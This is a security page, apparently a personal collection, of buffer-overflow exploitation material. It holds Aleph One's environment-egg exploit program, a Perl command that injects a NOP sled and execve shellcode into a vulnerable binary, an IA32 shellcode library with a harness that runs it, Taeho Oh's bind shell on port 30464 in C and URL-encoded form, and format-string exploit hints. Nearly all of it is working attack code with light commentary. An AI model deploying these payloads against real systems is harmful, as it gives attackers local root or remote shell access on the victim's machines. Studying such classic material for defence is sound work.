Computer Security

Advisories, published exploits/PoC and published papers/articles


 


Exploiting buffer overflows:


Local attacks:

/* Program copied from "Smashing the stack for fun and profit"
 * of Aleph One
 *
 * Reference: http://www.phrack.org/phrack/49/P49-14
 */

#include <stdlib.h>

/* Defaults that main() overrides from argv[1..3]: size of the address buffer,
 * offset subtracted from the stack pointer, and size of the "egg"
 * (NOP sled followed by the shellcode). */
#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
/* Single-byte x86 `nop` opcode used to fill the sled in front of the shellcode. */
#define NOP                            0x90

/* IA32 Linux execve("/bin/sh") shellcode taken from the Phrack article
 * referenced above: it ends with the literal "/bin/sh" and issues syscall
 * 0x0b through int 0x80 (the `\xb0\x0b` ... `\xcd\x80` bytes), followed by
 * an exit syscall.  main() measures it with strlen(), so it must contain no
 * 0x00 byte before the terminator. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Return the current stack pointer.
 *
 * There is no C `return` statement: the inline asm copies %esp into %eax
 * and the IA32 calling convention returns integers in %eax, so the value
 * only reaches the caller if the compiler emits nothing that touches %eax
 * afterwards.  That is undefined behaviour in C (missing return value, no
 * clobber declared) and is 32-bit only; it is kept verbatim from the
 * original article. */
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

/* Build two environment strings -- EGG (NOP sled + shellcode) and RET (the
 * guessed stack address repeated) -- export them with putenv() and spawn
 * /bin/bash with that environment.
 *
 * argv[1] buffer size, argv[2] offset below the stack pointer, argv[3] egg
 * size; all parsed with atoi() and never range-checked.
 *
 * Only <stdlib.h> is included, so printf/strlen/memcpy/putenv/system are
 * implicitly declared here (implicit declarations were removed from the
 * language in C99); <stdio.h>, <string.h> and <unistd.h> would be needed to
 * build this today.  `void main` is also non-standard.  Kept as in the
 * original listing. */
void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  /* atoi() reports no errors: a non-numeric, zero or negative argument goes
   * straight into malloc() and into the loop bounds below. */
  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);


  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);   /* exits with a success status even though allocation failed */
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  /* Guessed address: this process's stack pointer minus the offset. */
  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);   /* %x with a long argument: format mismatch */

  /* Fill buff with the guessed address.  Each store writes sizeof(long)
   * bytes while i advances by 4, and `i < bsize` ignores a trailing partial
   * word: correct only when sizeof(long) == 4 and bsize is a multiple of 4,
   * otherwise the loop writes past the end of buff. */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* NOP sled, then the shellcode at the very end of the egg.
   * `eggsize - strlen(shellcode) - 1` is size_t arithmetic: if eggsize is
   * smaller than the shellcode plus one it wraps to a huge bound and the
   * loop runs off the end of egg. */
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* Prefix both buffers in place with NAME= (overwriting the first four NOPs
   * / the first address) and export them.  putenv() keeps the pointer rather
   * than copying, so the buffers are intentionally never freed. */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}


Anyway, I prefer to use a more direct method: injecting the shellcode with Perl.
Let's imagine that a program vulnerable to a buffer overflow caused by an overly long argument lives at /usr/bin/vulnprogram. With the help of gdb we find out how many bytes the argument needs in order to overwrite EIP, and we see that 0xbfffe73c would be a good address to jump to; then:

# Constructed example for the text above: 400 NOP bytes (0x90) as the sled,
# the '0bin0sh' execve shellcode (the same bytes as shellcode6 in the library
# below), three bytes of padding, and the chosen address 0xbfffe73c repeated
# 160 times in little-endian order.  The counts are those found with gdb for
# the hypothetical /usr/bin/vulnprogram, not general values.
/usr/bin/vulnprogram `perl -e 'print "\x90"x400 .
"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x80\x2e\x01\x80\x6e\x04\x01\x8d\x1e\x89" .
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8" .
"\xda\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68" . "\x22\x22\x22" . 
"\x3c\xe7\xff\xbf" x 160'`


Shellcodes for IA32:

; *****************************************************
;  Shellcode,
;  makes a low-level execve() syscall and runs
;  /bin/sh; relative addressing is used so that it
;  is more portable
;
;  This shellcode is meant to be injected as a file or
;   directory name, which is why, as can be seen, it
;   does not contain /bin/sh directly but 0bin0sh, so
;   that it is a valid file name.  Then, when the
;   shellcode runs, 1 is subtracted from each 0 to
;   yield /          /=0x2f  0=0x30
;
;  The assembled bytes are shellcode6 in the C library
;   below.
;  NOTE(review): `long` is not a NASM operand-size
;   keyword (`dword` is) -- confirm which assembler this
;   was written for.
;
; Programmed by jack <jack at gulcas.org>
; http://ciberjacobo.com
; ****************************************************

section	.text
	global	_start

_start:
	jmp short	GotoCall           ; jump forward so that the call below pushes the string's address

shellcode:
	pop		esi                ; esi = address of '0bin0sh' (pushed by the call)
	xor		eax,eax
	mov byte	[esi + 7], al      ; terminate the string with a NUL
	sub byte	[esi],1            ; replace the 1st 0 with /
	sub byte	[esi + 4],1        ;  "           " 2nd  " " "
	lea		ebx, [esi]
	mov long	[esi + 8], ebx     ; argv[0] = pointer to "/bin/sh"
	mov long	[esi + 12], eax    ; argv[1] = NULL
	mov byte	al, 0x0b           ; execve syscall #
	mov		ebx, esi           ; argv1 (ebx = filename)
	lea		ecx, [esi + 8]     ; argv2 (ecx = argv)
	lea		edx, [esi + 12]    ; argv3 (edx = envp, here pointing at a NULL)
	int		0x80

GotoCall:
	call		shellcode
	db		'0bin0sh'
/*
 * Shellcodes library
 *
 *
 *
 * Programmed by jack <jack at gulcas.org>
 * http://ciberjacobo.com
 */

/* Most entries below are IA32 Linux machine code in the "jmp / call / pop esi"
 * style of the NASM listing above: the string that follows the final call is
 * popped into esi, patched in place, and passed to execve (syscall 0x0b via
 * int 0x80). */

/* shell sh spawner with placeholders by jack
 * (the "JAAAAKKKK" bytes after "/bin/sh" are the placeholders the code
 *  overwrites at run time: the NUL terminator, argv[0] and the NULL) */
char shellcode1[] = 
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x4b\x4b\x4b"
	"\x4b";


/* shell sh spawner without placeholders by jack
 * (same code as shellcode1; the run-time stores at [esi+7..15] land just
 *  past the end of "/bin/sh") */
char shellcode2[] = 
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68";


/* shell bash spawner without placeholders by jack
 * (offsets 0x09/0x0a/0x0e instead of 0x07/0x08/0x0c because "/bin/bash"
 *  is two bytes longer than "/bin/sh") */
char shellcode3[] =
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x09\x8d\x1e\x89\x5e\x0a\x89\x46\x0e"
	"\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";


/* shellcode for ls without placeholders by jack ("/bin/ls") */
char shellcode4[] = 
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x6c\x73";


/* shellcode for exit(0): xor ebx,ebx; mov al,1; int 0x80.
 * Only %al is set, so it relies on the upper bytes of %eax being zero. */
char shellcode5[] =
	"\x31\xdb\xb0\x01\xcd\x80";


/* shell sh spawner for file or path injection by jack
 * (byte-for-byte the assembled form of the NASM '0bin0sh' listing above) */
char shellcode6[] =
	"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x80\x2e\x01\x80\x6e\x04\x01"
	"\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
	"\x8d\x56\x0c\xcd\x80\xe8\xda\xff\xff\xff\x30\x62\x69\x6e\x30"
	"\x73\x68";


/* Choose a shellcode to try: */
char *shellcode= shellcode6;

/* Test harness: overwrite main's own saved return address with the address
 * of the selected shellcode array, so that returning from main transfers
 * control into the bytes.
 *
 * `(int*) &ret + 2` assumes the saved return address sits exactly two
 * 32-bit words above the local `ret`; that depends on the compiler's frame
 * layout and optimisation level and is undefined behaviour in C.
 * `(int)shellcode` additionally assumes 32-bit pointers, and the array must
 * be in executable memory for the jump to run it -- whether a writable
 * .data page is executable depends on the toolchain and kernel of the
 * build host. */
int main() {
  int *ret;
  ret = (int*) &ret + 2;
  // Dirty trick to be able to execute machine code
  (*ret) = (int)shellcode;
}

Remote attacks:

Taeho Oh bindshell on port 30464, in several formats:
/* Taeho Oh's IA32 Linux bind shell, 177 bytes.  The comment on each line is
 * the disassembly of that byte group.  The int $0x80 calls, by syscall
 * number: 0x02 fork; 0x66 socketcall with %bl = 1 socket(2,1,6), 2 bind,
 * 4 listen, 5 accept; 0x3f dup2 of fds 0, 1 and 2 onto the accepted socket;
 * 0x0b execve("/bin/sh"); 0x01 exit.  The socket and execve argument areas
 * are built in place at (%esi), the address pushed by the final `call`.
 * The two listings below are the same bytes in other formats (they reuse
 * the name `shellcode` and are not meant to be compiled in one file). */
char shellcode[]= /* 177 bytes                                   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80"                      /* int $0x80             */
	"\x85\xc0"                      /* testl %eax,%eax       */
	"\x75\x43"                      /* jne 0x43              */
	"\xeb\x43"                      /* jmp 0x43              */
	"\x5e"                          /* popl %esi             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */

	/* bind port: %ax = 0x0077 is stored into sin_port; read in network
	 * byte order that is 0x7700 = 30464 */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */

	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x04"                      /* jmp 0x4               */
	"\xeb\x55"                      /* jmp 0x55              */
	"\xeb\x5b"                      /* jmp 0x5b              */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x01"                      /* movb $0x1,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x02"                      /* movb $0x2,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5            */



/* The same 177-byte bind shell as the annotated listing above, as a single
 * string literal without the per-instruction comments. */
char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31"
"\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08"
"\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46"
"\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66"
"\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0"
"\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f"
"\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0"
"\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";


/* Taeho Oh bindshell (177 bytes) HTML-escaped */

%31%c0%b0%02%cd%80%85%c0%75%43%eb%43%5e%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%eb%04%eb%55%eb%5b%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%2f%62%69%6e%89%06%b8%2f%73%68%2f%89%46%04%31%c0%88%46%07%89%76%08%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd%80%e8%5b%ff%ff%ff

Format strings


Some hints for exploiting:
%numberx  (align with spaces)
%number$n
%#numberx (align with spaces)
%x%x%x%xAAAAAAAAAAAAAAAAAAAA-%n